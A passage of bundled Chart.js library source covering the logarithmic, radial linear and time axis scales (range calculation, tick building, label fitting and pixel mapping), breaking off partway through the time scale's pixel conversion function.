var getValueOrDefault = helpers.getValueOrDefault;
var isHorizontal = me.isHorizontal();
function IDMatches(meta) {
return isHorizontal ? meta.xAxisID === me.id : meta.yAxisID === me.id;
}
// Calculate Range
me.min = null;
me.max = null;
me.minNotZero = null;
if (opts.stacked) {
var valuesPerType = {};
helpers.each(datasets, function (dataset, datasetIndex) {
var meta = chart.getDatasetMeta(datasetIndex);
if (chart.isDatasetVisible(datasetIndex) && IDMatches(meta)) {
if (valuesPerType[meta.type] === undefined) {
valuesPerType[meta.type] = [];
}
helpers.each(dataset.data, function (rawValue, index) {
var values = valuesPerType[meta.type];
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
values[index] = values[index] || 0;
if (opts.relativePoints) {
values[index] = 100;
} else {
// Don't need to split positive and negative since the log scale can't handle a 0 crossing
values[index] += value;
}
});
}
});
helpers.each(valuesPerType, function (valuesForType) {
var minVal = helpers.min(valuesForType);
var maxVal = helpers.max(valuesForType);
me.min = me.min === null ? minVal : Math.min(me.min, minVal);
me.max = me.max === null ? maxVal : Math.max(me.max, maxVal);
});
} else {
helpers.each(datasets, function (dataset, datasetIndex) {
var meta = chart.getDatasetMeta(datasetIndex);
if (chart.isDatasetVisible(datasetIndex) && IDMatches(meta)) {
helpers.each(dataset.data, function (rawValue, index) {
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
if (me.min === null) {
me.min = value;
} else if (value < me.min) {
me.min = value;
}
if (me.max === null) {
me.max = value;
} else if (value > me.max) {
me.max = value;
}
if (value !== 0 && (me.minNotZero === null || value < me.minNotZero)) {
me.minNotZero = value;
}
});
}
});
}
me.min = getValueOrDefault(tickOpts.min, me.min);
me.max = getValueOrDefault(tickOpts.max, me.max);
if (me.min === me.max) {
if (me.min !== 0 && me.min !== null) {
me.min = Math.pow(10, Math.floor(helpers.log10(me.min)) - 1);
me.max = Math.pow(10, Math.floor(helpers.log10(me.max)) + 1);
} else {
me.min = 1;
me.max = 10;
}
}
},
buildTicks: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
var generationOptions = {
min: tickOpts.min,
max: tickOpts.max
};
var ticks = me.ticks = Chart.Ticks.generators.logarithmic(generationOptions, me);
if (!me.isHorizontal()) {
// We are in a vertical orientation. The top value is the highest. So reverse the array
ticks.reverse();
}
// At this point, we need to update our max and min given the tick values since we have expanded the
// range of the scale
me.max = helpers.max(ticks);
me.min = helpers.min(ticks);
if (tickOpts.reverse) {
ticks.reverse();
me.start = me.max;
me.end = me.min;
} else {
me.start = me.min;
me.end = me.max;
}
},
convertTicksToLabels: function () {
this.tickValues = this.ticks.slice();
Chart.Scale.prototype.convertTicksToLabels.call(this);
},
// Get the correct tooltip label
getLabelForIndex: function (index, datasetIndex) {
return +this.getRightValue(this.chart.data.datasets[datasetIndex].data[index]);
},
getPixelForTick: function (index) {
return this.getPixelForValue(this.tickValues[index]);
},
getPixelForValue: function (value) {
var me = this;
var innerDimension;
var pixel;
var start = me.start;
var newVal = +me.getRightValue(value);
var range;
var paddingTop = me.paddingTop;
var paddingBottom = me.paddingBottom;
var paddingLeft = me.paddingLeft;
var opts = me.options;
var tickOpts = opts.ticks;
if (me.isHorizontal()) {
range = helpers.log10(me.end) - helpers.log10(start); // todo: if start === 0
if (newVal === 0) {
pixel = me.left + paddingLeft;
} else {
innerDimension = me.width - (paddingLeft + me.paddingRight);
pixel = me.left + (innerDimension / range * (helpers.log10(newVal) - helpers.log10(start)));
pixel += paddingLeft;
}
} else {
// Bottom - top since pixels increase downward on a screen
innerDimension = me.height - (paddingTop + paddingBottom);
if (start === 0 && !tickOpts.reverse) {
range = helpers.log10(me.end) - helpers.log10(me.minNotZero);
if (newVal === start) {
pixel = me.bottom - paddingBottom;
} else if (newVal === me.minNotZero) {
pixel = me.bottom - paddingBottom - innerDimension * 0.02;
} else {
pixel = me.bottom - paddingBottom - innerDimension * 0.02 - (innerDimension * 0.98 / range * (helpers.log10(newVal) - helpers.log10(me.minNotZero)));
}
} else if (me.end === 0 && tickOpts.reverse) {
range = helpers.log10(me.start) - helpers.log10(me.minNotZero);
if (newVal === me.end) {
pixel = me.top + paddingTop;
} else if (newVal === me.minNotZero) {
pixel = me.top + paddingTop + innerDimension * 0.02;
} else {
pixel = me.top + paddingTop + innerDimension * 0.02 + (innerDimension * 0.98 / range * (helpers.log10(newVal) - helpers.log10(me.minNotZero)));
}
} else {
range = helpers.log10(me.end) - helpers.log10(start);
innerDimension = me.height - (paddingTop + paddingBottom);
pixel = (me.bottom - paddingBottom) - (innerDimension / range * (helpers.log10(newVal) - helpers.log10(start)));
}
}
return pixel;
},
getValueForPixel: function (pixel) {
var me = this;
var range = helpers.log10(me.end) - helpers.log10(me.start);
var value, innerDimension;
if (me.isHorizontal()) {
innerDimension = me.width - (me.paddingLeft + me.paddingRight);
value = me.start * Math.pow(10, (pixel - me.left - me.paddingLeft) * range / innerDimension);
} else { // todo: if start === 0
innerDimension = me.height - (me.paddingTop + me.paddingBottom);
value = me.start * Math.pow(10, (me.bottom - me.paddingBottom - pixel) * range / innerDimension); // inverse of getPixelForValue, so scale by start rather than dividing
}
return value;
}
});
Chart.scaleService.registerScaleType('logarithmic', LogarithmicScale, defaultConfig);
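/*
 * Usage sketch (values illustrative): a logarithmic axis suits data spanning
 * several orders of magnitude; ticks fall on powers of ten by default:
 *
 * options: {scales: {yAxes: [{type: 'logarithmic', ticks: {min: 1, max: 100000}}]}}
 */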
};
}, {}], 45: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var globalDefaults = Chart.defaults.global;
var defaultConfig = {
display: true,
// Boolean - Whether to animate scaling the chart from the centre
animate: true,
lineArc: false,
position: 'chartArea',
angleLines: {
display: true,
color: 'rgba(0, 0, 0, 0.1)',
lineWidth: 1
},
// label settings
ticks: {
// Boolean - Show a backdrop to the scale label
showLabelBackdrop: true,
// String - The colour of the label backdrop
backdropColor: 'rgba(255,255,255,0.75)',
// Number - The backdrop padding above & below the label in pixels
backdropPaddingY: 2,
// Number - The backdrop padding to the side of the label in pixels
backdropPaddingX: 2,
callback: Chart.Ticks.formatters.linear
},
pointLabels: {
// Number - Point label font size in pixels
fontSize: 10,
// Function - Used to convert point labels
callback: function (label) {
return label;
}
}
};
var LinearRadialScale = Chart.LinearScaleBase.extend({
getValueCount: function () {
return this.chart.data.labels.length;
},
setDimensions: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
// Set the unconstrained dimension before label rotation
me.width = me.maxWidth;
me.height = me.maxHeight;
me.xCenter = Math.round(me.width / 2);
me.yCenter = Math.round(me.height / 2);
var minSize = helpers.min([me.height, me.width]);
var tickFontSize = helpers.getValueOrDefault(tickOpts.fontSize, globalDefaults.defaultFontSize);
me.drawingArea = opts.display ? (minSize / 2) - (tickFontSize / 2 + tickOpts.backdropPaddingY) : (minSize / 2);
},
determineDataLimits: function () {
var me = this;
var chart = me.chart;
me.min = null;
me.max = null;
helpers.each(chart.data.datasets, function (dataset, datasetIndex) {
if (chart.isDatasetVisible(datasetIndex)) {
var meta = chart.getDatasetMeta(datasetIndex);
helpers.each(dataset.data, function (rawValue, index) {
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
if (me.min === null) {
me.min = value;
} else if (value < me.min) {
me.min = value;
}
if (me.max === null) {
me.max = value;
} else if (value > me.max) {
me.max = value;
}
});
}
});
// Common base implementation to handle ticks.min, ticks.max, ticks.beginAtZero
me.handleTickRangeOptions();
},
getTickLimit: function () {
var tickOpts = this.options.ticks;
var tickFontSize = helpers.getValueOrDefault(tickOpts.fontSize, globalDefaults.defaultFontSize);
return Math.min(tickOpts.maxTicksLimit ? tickOpts.maxTicksLimit : 11, Math.ceil(this.drawingArea / (1.5 * tickFontSize)));
},
convertTicksToLabels: function () {
var me = this;
Chart.LinearScaleBase.prototype.convertTicksToLabels.call(me);
// Point labels
me.pointLabels = me.chart.data.labels.map(me.options.pointLabels.callback, me);
},
getLabelForIndex: function (index, datasetIndex) {
return +this.getRightValue(this.chart.data.datasets[datasetIndex].data[index]);
},
fit: function () {
/*
* Right, this is really confusing and there is a lot of maths going on here
* The gist of the problem is here: https://gist.github.com/nnnick/696cc9c55f4b0beb8fe9
*
* Reaction: https://dl.dropboxusercontent.com/u/34601363/toomuchscience.gif
*
* Solution:
*
* We assume the radius of the polygon is half the size of the canvas at first
* at each index we check if the text overlaps.
*
* Where it does, we store that angle and that index.
*
* After finding the largest index and angle we calculate how much we need to remove
* from the shape radius to move the point inwards by that x.
*
* We average the left and right distances to get the maximum shape radius that can fit in the box
* along with labels.
*
* Once we have that, we can find the centre point for the chart, by taking the x text protrusion
* on each side, removing that from the size, halving it and adding the left x protrusion width.
*
* This will mean we have a shape fitted to the canvas, as large as it can be with the labels
* and position it in the most space efficient manner
*
* https://dl.dropboxusercontent.com/u/34601363/yeahscience.gif
*/
var pointLabels = this.options.pointLabels;
var pointLabelFontSize = helpers.getValueOrDefault(pointLabels.fontSize, globalDefaults.defaultFontSize);
var pointLabelFontStyle = helpers.getValueOrDefault(pointLabels.fontStyle, globalDefaults.defaultFontStyle);
var pointLabelFontFamily = helpers.getValueOrDefault(pointLabels.fontFamily, globalDefaults.defaultFontFamily);
var pointLabelFont = helpers.fontString(pointLabelFontSize, pointLabelFontStyle, pointLabelFontFamily);
// Get maximum radius of the polygon. Either half the height (minus the text width) or half the width.
// Use this to calculate the offset + change. - Make sure L/R protrusion is at least 0 to stop issues with centre points
var largestPossibleRadius = helpers.min([(this.height / 2 - pointLabelFontSize - 5), this.width / 2]),
pointPosition,
i,
textWidth,
halfTextWidth,
furthestRight = this.width,
furthestRightIndex,
furthestRightAngle,
furthestLeft = 0,
furthestLeftIndex,
furthestLeftAngle,
xProtrusionLeft,
xProtrusionRight,
radiusReductionRight,
radiusReductionLeft;
this.ctx.font = pointLabelFont;
for (i = 0; i < this.getValueCount(); i++) {
// 5px to space the text slightly out - similar to what we do in the draw function.
pointPosition = this.getPointPosition(i, largestPossibleRadius);
textWidth = this.ctx.measureText(this.pointLabels[i] ? this.pointLabels[i] : '').width + 5;
// Add quarter circle to make degree 0 mean top of circle
var angleRadians = this.getIndexAngle(i) + (Math.PI / 2);
var angle = (angleRadians * 360 / (2 * Math.PI)) % 360;
if (angle === 0 || angle === 180) {
// At angle 0 and 180, we're at exactly the top/bottom
// of the radar chart, so text will be aligned centrally, so we'll halve it and compare
// w/left and right text sizes
halfTextWidth = textWidth / 2;
if (pointPosition.x + halfTextWidth > furthestRight) {
furthestRight = pointPosition.x + halfTextWidth;
furthestRightIndex = i;
}
if (pointPosition.x - halfTextWidth < furthestLeft) {
furthestLeft = pointPosition.x - halfTextWidth;
furthestLeftIndex = i;
}
} else if (angle < 180) {
// Less than half the values means we'll left align the text
if (pointPosition.x + textWidth > furthestRight) {
furthestRight = pointPosition.x + textWidth;
furthestRightIndex = i;
}
// More than half the values means we'll right align the text
} else if (pointPosition.x - textWidth < furthestLeft) {
furthestLeft = pointPosition.x - textWidth;
furthestLeftIndex = i;
}
}
xProtrusionLeft = furthestLeft;
xProtrusionRight = Math.ceil(furthestRight - this.width);
furthestRightAngle = this.getIndexAngle(furthestRightIndex);
furthestLeftAngle = this.getIndexAngle(furthestLeftIndex);
radiusReductionRight = xProtrusionRight / Math.sin(furthestRightAngle + Math.PI / 2);
radiusReductionLeft = xProtrusionLeft / Math.sin(furthestLeftAngle + Math.PI / 2);
// Ensure we actually need to reduce the size of the chart
radiusReductionRight = (helpers.isNumber(radiusReductionRight)) ? radiusReductionRight : 0;
radiusReductionLeft = (helpers.isNumber(radiusReductionLeft)) ? radiusReductionLeft : 0;
this.drawingArea = Math.round(largestPossibleRadius - (radiusReductionLeft + radiusReductionRight) / 2);
this.setCenterPoint(radiusReductionLeft, radiusReductionRight);
},
setCenterPoint: function (leftMovement, rightMovement) {
var me = this;
var maxRight = me.width - rightMovement - me.drawingArea,
maxLeft = leftMovement + me.drawingArea;
me.xCenter = Math.round(((maxLeft + maxRight) / 2) + me.left);
// Always vertically in the centre as the text height doesn't change
me.yCenter = Math.round((me.height / 2) + me.top);
},
getIndexAngle: function (index) {
var angleMultiplier = (Math.PI * 2) / this.getValueCount();
var startAngle = this.chart.options && this.chart.options.startAngle ?
this.chart.options.startAngle :
0;
var startAngleRadians = startAngle * Math.PI * 2 / 360;
// Start from the top instead of right, so remove a quarter of the circle
return index * angleMultiplier - (Math.PI / 2) + startAngleRadians;
},
getDistanceFromCenterForValue: function (value) {
var me = this;
if (value === null) {
return 0; // null always in center
}
// Take into account half font size + the yPadding of the top value
var scalingFactor = me.drawingArea / (me.max - me.min);
if (me.options.reverse) {
return (me.max - value) * scalingFactor;
}
return (value - me.min) * scalingFactor;
},
getPointPosition: function (index, distanceFromCenter) {
var me = this;
var thisAngle = me.getIndexAngle(index);
return {
x: Math.round(Math.cos(thisAngle) * distanceFromCenter) + me.xCenter,
y: Math.round(Math.sin(thisAngle) * distanceFromCenter) + me.yCenter
};
},
getPointPositionForValue: function (index, value) {
return this.getPointPosition(index, this.getDistanceFromCenterForValue(value));
},
getBasePosition: function () {
var me = this;
var min = me.min;
var max = me.max;
return me.getPointPositionForValue(0,
me.beginAtZero ? 0 :
min < 0 && max < 0 ? max :
min > 0 && max > 0 ? min :
0);
},
draw: function () {
var me = this;
var opts = me.options;
var gridLineOpts = opts.gridLines;
var tickOpts = opts.ticks;
var angleLineOpts = opts.angleLines;
var pointLabelOpts = opts.pointLabels;
var getValueOrDefault = helpers.getValueOrDefault;
if (opts.display) {
var ctx = me.ctx;
// Tick Font
var tickFontSize = getValueOrDefault(tickOpts.fontSize, globalDefaults.defaultFontSize);
var tickFontStyle = getValueOrDefault(tickOpts.fontStyle, globalDefaults.defaultFontStyle);
var tickFontFamily = getValueOrDefault(tickOpts.fontFamily, globalDefaults.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
helpers.each(me.ticks, function (label, index) {
// Don't draw a centre value (if it is minimum)
if (index > 0 || opts.reverse) {
var yCenterOffset = me.getDistanceFromCenterForValue(me.ticksAsNumbers[index]);
var yHeight = me.yCenter - yCenterOffset;
// Draw circular lines around the scale
if (gridLineOpts.display && index !== 0) {
ctx.strokeStyle = helpers.getValueAtIndexOrDefault(gridLineOpts.color, index - 1);
ctx.lineWidth = helpers.getValueAtIndexOrDefault(gridLineOpts.lineWidth, index - 1);
if (opts.lineArc) {
// Draw circular arcs between the points
ctx.beginPath();
ctx.arc(me.xCenter, me.yCenter, yCenterOffset, 0, Math.PI * 2);
ctx.closePath();
ctx.stroke();
} else {
// Draw straight lines connecting each index
ctx.beginPath();
for (var i = 0; i < me.getValueCount(); i++) {
var pointPosition = me.getPointPosition(i, yCenterOffset);
if (i === 0) {
ctx.moveTo(pointPosition.x, pointPosition.y);
} else {
ctx.lineTo(pointPosition.x, pointPosition.y);
}
}
ctx.closePath();
ctx.stroke();
}
}
if (tickOpts.display) {
var tickFontColor = getValueOrDefault(tickOpts.fontColor, globalDefaults.defaultFontColor);
ctx.font = tickLabelFont;
if (tickOpts.showLabelBackdrop) {
var labelWidth = ctx.measureText(label).width;
ctx.fillStyle = tickOpts.backdropColor;
ctx.fillRect(
me.xCenter - labelWidth / 2 - tickOpts.backdropPaddingX,
yHeight - tickFontSize / 2 - tickOpts.backdropPaddingY,
labelWidth + tickOpts.backdropPaddingX * 2,
tickFontSize + tickOpts.backdropPaddingY * 2
);
}
ctx.textAlign = 'center';
ctx.textBaseline = 'middle';
ctx.fillStyle = tickFontColor;
ctx.fillText(label, me.xCenter, yHeight);
}
}
});
if (!opts.lineArc) {
ctx.lineWidth = angleLineOpts.lineWidth;
ctx.strokeStyle = angleLineOpts.color;
var outerDistance = me.getDistanceFromCenterForValue(opts.reverse ? me.min : me.max);
// Point Label Font
var pointLabelFontSize = getValueOrDefault(pointLabelOpts.fontSize, globalDefaults.defaultFontSize);
var pointLabelFontStyle = getValueOrDefault(pointLabelOpts.fontStyle, globalDefaults.defaultFontStyle);
var pointLabelFontFamily = getValueOrDefault(pointLabelOpts.fontFamily, globalDefaults.defaultFontFamily);
var pointLabelFont = helpers.fontString(pointLabelFontSize, pointLabelFontStyle, pointLabelFontFamily);
for (var i = me.getValueCount() - 1; i >= 0; i--) {
if (angleLineOpts.display) {
var outerPosition = me.getPointPosition(i, outerDistance);
ctx.beginPath();
ctx.moveTo(me.xCenter, me.yCenter);
ctx.lineTo(outerPosition.x, outerPosition.y);
ctx.stroke();
ctx.closePath();
}
// Extra 5px out for some label spacing
var pointLabelPosition = me.getPointPosition(i, outerDistance + 5);
// Keep this in loop since we may support array properties here
var pointLabelFontColor = getValueOrDefault(pointLabelOpts.fontColor, globalDefaults.defaultFontColor);
ctx.font = pointLabelFont;
ctx.fillStyle = pointLabelFontColor;
var pointLabels = me.pointLabels;
// Add quarter circle to make degree 0 mean top of circle
var angleRadians = this.getIndexAngle(i) + (Math.PI / 2);
var angle = (angleRadians * 360 / (2 * Math.PI)) % 360;
if (angle === 0 || angle === 180) {
ctx.textAlign = 'center';
} else if (angle < 180) {
ctx.textAlign = 'left';
} else {
ctx.textAlign = 'right';
}
// Set the correct text baseline based on outer positioning
if (angle === 90 || angle === 270) {
ctx.textBaseline = 'middle';
} else if (angle > 270 || angle < 90) {
ctx.textBaseline = 'bottom';
} else {
ctx.textBaseline = 'top';
}
ctx.fillText(pointLabels[i] ? pointLabels[i] : '', pointLabelPosition.x, pointLabelPosition.y);
}
}
}
}
});
Chart.scaleService.registerScaleType('radialLinear', LinearRadialScale, defaultConfig);
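/*
 * Usage sketch for a radar chart (values illustrative): radial charts take a
 * single `scale` option rather than the `scales.xAxes`/`scales.yAxes` arrays:
 *
 * options: {
 *     scale: {
 *         ticks: {beginAtZero: true, showLabelBackdrop: false},
 *         pointLabels: {fontSize: 14}
 *     }
 * }
 */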
};
}, {}], 46: [function (require, module, exports) {
/* global window: false */
'use strict';
var moment = require(1);
moment = typeof(moment) === 'function' ? moment : window.moment;
module.exports = function (Chart) {
var helpers = Chart.helpers;
var time = {
units: [{
name: 'millisecond',
steps: [1, 2, 5, 10, 20, 50, 100, 250, 500]
}, {
name: 'second',
steps: [1, 2, 5, 10, 30]
}, {
name: 'minute',
steps: [1, 2, 5, 10, 30]
}, {
name: 'hour',
steps: [1, 2, 3, 6, 12]
}, {
name: 'day',
steps: [1, 2, 5]
}, {
name: 'week',
maxStep: 4
}, {
name: 'month',
maxStep: 3
}, {
name: 'quarter',
maxStep: 4
}, {
name: 'year',
maxStep: false
}]
};
var defaultConfig = {
position: 'bottom',
time: {
parser: false, // false == a pattern string from http://momentjs.com/docs/#/parsing/string-format/ or a custom callback that converts its argument to a moment
format: false, // DEPRECATED false == date objects, moment object, callback or a pattern string from http://momentjs.com/docs/#/parsing/string-format/
unit: false, // false == automatic or override with week, month, year, etc.
round: false, // none, or override with week, month, year, etc.
displayFormat: false, // DEPRECATED
isoWeekday: false, // override week start day - see http://momentjs.com/docs/#/get-set/iso-weekday/
minUnit: 'millisecond',
// defaults to unit's corresponding unitFormat below or override using pattern string from http://momentjs.com/docs/#/displaying/format/
displayFormats: {
millisecond: 'h:mm:ss.SSS a', // 11:20:01.123 AM,
second: 'h:mm:ss a', // 11:20:01 AM
minute: 'h:mm:ss a', // 11:20:01 AM
hour: 'MMM D, hA', // Sept 4, 5PM
day: 'll', // Sep 4 2015
week: 'll', // Week 46, or maybe "[W]WW - YYYY" ?
month: 'MMM YYYY', // Sept 2015
quarter: '[Q]Q - YYYY', // Q3
year: 'YYYY' // 2015
}
},
ticks: {
autoSkip: false
}
};
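/*
 * Usage sketch (format strings illustrative): `parser` tells moment how to
 * read string labels and `unit` forces the tick granularity:
 *
 * options: {scales: {xAxes: [{type: 'time', time: {parser: 'YYYY-MM-DD', unit: 'month'}}]}}
 */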
var TimeScale = Chart.Scale.extend({
initialize: function () {
if (!moment) {
throw new Error('Chart.js - Moment.js could not be found! You must include it before Chart.js to use the time scale. Download at https://momentjs.com');
}
Chart.Scale.prototype.initialize.call(this);
},
getLabelMoment: function (datasetIndex, index) {
if (datasetIndex === null || index === null) {
return null;
}
if (typeof this.labelMoments[datasetIndex] !== 'undefined') {
return this.labelMoments[datasetIndex][index];
}
return null;
},
getLabelDiff: function (datasetIndex, index) {
var me = this;
if (datasetIndex === null || index === null) {
return null;
}
if (me.labelDiffs === undefined) {
me.buildLabelDiffs();
}
if (typeof me.labelDiffs[datasetIndex] !== 'undefined') {
return me.labelDiffs[datasetIndex][index];
}
return null;
},
getMomentStartOf: function (tick) {
var me = this;
if (me.options.time.unit === 'week' && me.options.time.isoWeekday !== false) {
return tick.clone().startOf('isoWeek').isoWeekday(me.options.time.isoWeekday);
}
return tick.clone().startOf(me.tickUnit);
},
determineDataLimits: function () {
var me = this;
me.labelMoments = [];
// Only parse these once. If the dataset does not have data as x,y pairs, we will use
// these
var scaleLabelMoments = [];
if (me.chart.data.labels && me.chart.data.labels.length > 0) {
helpers.each(me.chart.data.labels, function (label) {
var labelMoment = me.parseTime(label);
if (labelMoment.isValid()) {
if (me.options.time.round) {
labelMoment.startOf(me.options.time.round);
}
scaleLabelMoments.push(labelMoment);
}
}, me);
me.firstTick = moment.min.call(me, scaleLabelMoments);
me.lastTick = moment.max.call(me, scaleLabelMoments);
} else {
me.firstTick = null;
me.lastTick = null;
}
helpers.each(me.chart.data.datasets, function (dataset, datasetIndex) {
var momentsForDataset = [];
var datasetVisible = me.chart.isDatasetVisible(datasetIndex);
if (typeof dataset.data[0] === 'object' && dataset.data[0] !== null) {
helpers.each(dataset.data, function (value) {
var labelMoment = me.parseTime(me.getRightValue(value));
if (labelMoment.isValid()) {
if (me.options.time.round) {
labelMoment.startOf(me.options.time.round);
}
momentsForDataset.push(labelMoment);
if (datasetVisible) {
// May have gone outside the scale ranges, make sure we keep the first and last ticks updated
me.firstTick = me.firstTick !== null ? moment.min(me.firstTick, labelMoment) : labelMoment;
me.lastTick = me.lastTick !== null ? moment.max(me.lastTick, labelMoment) : labelMoment;
}
}
}, me);
} else {
// We have no labels. Use the ones from the scale
momentsForDataset = scaleLabelMoments;
}
me.labelMoments.push(momentsForDataset);
}, me);
// Set these after we've done all the data
if (me.options.time.min) {
me.firstTick = me.parseTime(me.options.time.min);
}
if (me.options.time.max) {
me.lastTick = me.parseTime(me.options.time.max);
}
// We will modify these, so clone for later
me.firstTick = (me.firstTick || moment()).clone();
me.lastTick = (me.lastTick || moment()).clone();
},
buildLabelDiffs: function () {
var me = this;
me.labelDiffs = [];
var scaleLabelDiffs = [];
// Parse common labels once
if (me.chart.data.labels && me.chart.data.labels.length > 0) {
helpers.each(me.chart.data.labels, function (label) {
var labelMoment = me.parseTime(label);
if (labelMoment.isValid()) {
if (me.options.time.round) {
labelMoment.startOf(me.options.time.round);
}
scaleLabelDiffs.push(labelMoment.diff(me.firstTick, me.tickUnit, true));
}
}, me);
}
helpers.each(me.chart.data.datasets, function (dataset) {
var diffsForDataset = [];
if (typeof dataset.data[0] === 'object' && dataset.data[0] !== null) {
helpers.each(dataset.data, function (value) {
var labelMoment = me.parseTime(me.getRightValue(value));
if (labelMoment.isValid()) {
if (me.options.time.round) {
labelMoment.startOf(me.options.time.round);
}
diffsForDataset.push(labelMoment.diff(me.firstTick, me.tickUnit, true));
}
}, me);
} else {
// We have no labels. Use common ones
diffsForDataset = scaleLabelDiffs;
}
me.labelDiffs.push(diffsForDataset);
}, me);
},
buildTicks: function () {
var me = this;
me.ctx.save();
var tickFontSize = helpers.getValueOrDefault(me.options.ticks.fontSize, Chart.defaults.global.defaultFontSize);
var tickFontStyle = helpers.getValueOrDefault(me.options.ticks.fontStyle, Chart.defaults.global.defaultFontStyle);
var tickFontFamily = helpers.getValueOrDefault(me.options.ticks.fontFamily, Chart.defaults.global.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
me.ctx.font = tickLabelFont;
me.ticks = [];
me.unitScale = 1; // How much we scale the unit by, i.e. 2 means two units per step
me.scaleSizeInUnits = 0; // How large the scale is in the base unit (seconds, minutes, etc)
// Set unit override if applicable
if (me.options.time.unit) {
me.tickUnit = me.options.time.unit || 'day';
me.displayFormat = me.options.time.displayFormats[me.tickUnit];
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true);
me.unitScale = helpers.getValueOrDefault(me.options.time.unitStepSize, 1);
} else {
// Determine the smallest needed unit of the time
var innerWidth = me.isHorizontal() ? me.width - (me.paddingLeft + me.paddingRight) : me.height - (me.paddingTop + me.paddingBottom);
// Crude approximation of what the label length might be
var tempFirstLabel = me.tickFormatFunction(me.firstTick, 0, []);
var tickLabelWidth = me.ctx.measureText(tempFirstLabel).width;
var cosRotation = Math.cos(helpers.toRadians(me.options.ticks.maxRotation));
var sinRotation = Math.sin(helpers.toRadians(me.options.ticks.maxRotation));
tickLabelWidth = (tickLabelWidth * cosRotation) + (tickFontSize * sinRotation);
var labelCapacity = innerWidth / (tickLabelWidth);
// Start as small as possible
me.tickUnit = me.options.time.minUnit;
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true);
me.displayFormat = me.options.time.displayFormats[me.tickUnit];
var unitDefinitionIndex = 0;
var unitDefinition = time.units[unitDefinitionIndex];
// Walk up through the available units until one fits the label capacity (or we run out of units)
while (unitDefinitionIndex < time.units.length) {
// Can we scale this unit? If maxStep is false, the unit can be scaled indefinitely
me.unitScale = 1;
if (helpers.isArray(unitDefinition.steps) && Math.ceil(me.scaleSizeInUnits / labelCapacity) < helpers.max(unitDefinition.steps)) {
// Use one of the predefined steps
for (var idx = 0; idx < unitDefinition.steps.length; ++idx) {
if (unitDefinition.steps[idx] >= Math.ceil(me.scaleSizeInUnits / labelCapacity)) {
me.unitScale = helpers.getValueOrDefault(me.options.time.unitStepSize, unitDefinition.steps[idx]);
break;
}
}
break;
} else if ((unitDefinition.maxStep === false) || (Math.ceil(me.scaleSizeInUnits / labelCapacity) < unitDefinition.maxStep)) {
// We have a max step. Scale this unit
me.unitScale = helpers.getValueOrDefault(me.options.time.unitStepSize, Math.ceil(me.scaleSizeInUnits / labelCapacity));
break;
} else {
// Move to the next unit up
++unitDefinitionIndex;
unitDefinition = time.units[unitDefinitionIndex];
me.tickUnit = unitDefinition.name;
var leadingUnitBuffer = me.firstTick.diff(me.getMomentStartOf(me.firstTick), me.tickUnit, true);
var trailingUnitBuffer = me.getMomentStartOf(me.lastTick.clone().add(1, me.tickUnit)).diff(me.lastTick, me.tickUnit, true);
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true) + leadingUnitBuffer + trailingUnitBuffer;
me.displayFormat = me.options.time.displayFormats[unitDefinition.name];
}
}
}
var roundedStart;
// Only round the first tick if we have no hard minimum
if (!me.options.time.min) {
me.firstTick = me.getMomentStartOf(me.firstTick);
roundedStart = me.firstTick;
} else {
roundedStart = me.getMomentStartOf(me.firstTick);
}
// Only round the last tick if we have no hard maximum
if (!me.options.time.max) {
var roundedEnd = me.getMomentStartOf(me.lastTick);
var delta = roundedEnd.diff(me.lastTick, me.tickUnit, true);
if (delta < 0) {
// Do not use endOf here because the last tick needs to land in the next time unit
me.lastTick = me.getMomentStartOf(me.lastTick.add(1, me.tickUnit));
} else if (delta >= 0) {
me.lastTick = roundedEnd;
}
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true);
}
// Tick displayFormat override
if (me.options.time.displayFormat) {
me.displayFormat = me.options.time.displayFormat;
}
// first tick. will have been rounded correctly if options.time.min is not specified
me.ticks.push(me.firstTick.clone());
// For every unit in between the first and last moment, create a moment and add it to the ticks array
for (var i = 1; i <= me.scaleSizeInUnits; ++i) {
var newTick = roundedStart.clone().add(i, me.tickUnit);
// Are we greater than the max time
if (me.options.time.max && newTick.diff(me.lastTick, me.tickUnit, true) >= 0) {
break;
}
if (i % me.unitScale === 0) {
me.ticks.push(newTick);
}
}
// Always show the right tick
var diff = me.ticks[me.ticks.length - 1].diff(me.lastTick, me.tickUnit);
if (diff !== 0 || me.scaleSizeInUnits === 0) {
// this is a weird case. If the <max> option is the same as the end option, we can't just diff the times because the tick was created from the roundedStart
// but the last tick was not rounded.
if (me.options.time.max) {
me.ticks.push(me.lastTick.clone());
me.scaleSizeInUnits = me.lastTick.diff(me.ticks[0], me.tickUnit, true);
} else {
me.ticks.push(me.lastTick.clone());
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true);
}
}
me.ctx.restore();
// Invalidate label diffs cache
me.labelDiffs = undefined;
},
// Get tooltip label
getLabelForIndex: function (index, datasetIndex) {
var me = this;
var label = me.chart.data.labels && index < me.chart.data.labels.length ? me.chart.data.labels[index] : '';
if (typeof me.chart.data.datasets[datasetIndex].data[0] === 'object') {
label = me.getRightValue(me.chart.data.datasets[datasetIndex].data[index]);
}
// Format nicely
if (me.options.time.tooltipFormat) {
label = me.parseTime(label).format(me.options.time.tooltipFormat);
}
return label;
},
// Function to format an individual tick mark
tickFormatFunction: function (tick, index, ticks) {
var formattedTick = tick.format(this.displayFormat);
var tickOpts = this.options.ticks;
var callback = helpers.getValueOrDefault(tickOpts.callback, tickOpts.userCallback);
if (callback) {
return callback(formattedTick, index, ticks);
}
return formattedTick;
},
convertTicksToLabels: function () {
var me = this;
me.tickMoments = me.ticks;
me.ticks = me.ticks.map(me.tickFormatFunction, me);
},
getPixelForValue: function (value, index, datasetIndex) {
var me = this;
var offset = null;
if (index !== undefined && datasetIndex !== undefined) {
offset = me.getLabelDiff(datasetIndex, index);
}
